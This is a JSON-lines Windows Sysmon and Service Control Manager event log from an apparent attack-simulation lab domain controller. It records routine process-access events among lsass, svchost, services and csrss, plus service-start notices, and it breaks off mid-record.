{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.359\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.359","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010947F0500}","TargetProcessId":"804","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76844,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Distributed Transaction Coordinator service entered the running state.","param1":"Distributed Transaction Coordinator","param2":"running","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.437\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.437","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.499\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-001038840500}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.499","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-001038840500}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.499\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-001038840500}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x103800\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.499","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-001038840500}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x103800","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76845,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The sppsvc service entered the running state.","param1":"sppsvc","param2":"running","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-001038840500}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-001038840500}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-001038840500}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-001038840500}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.843\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 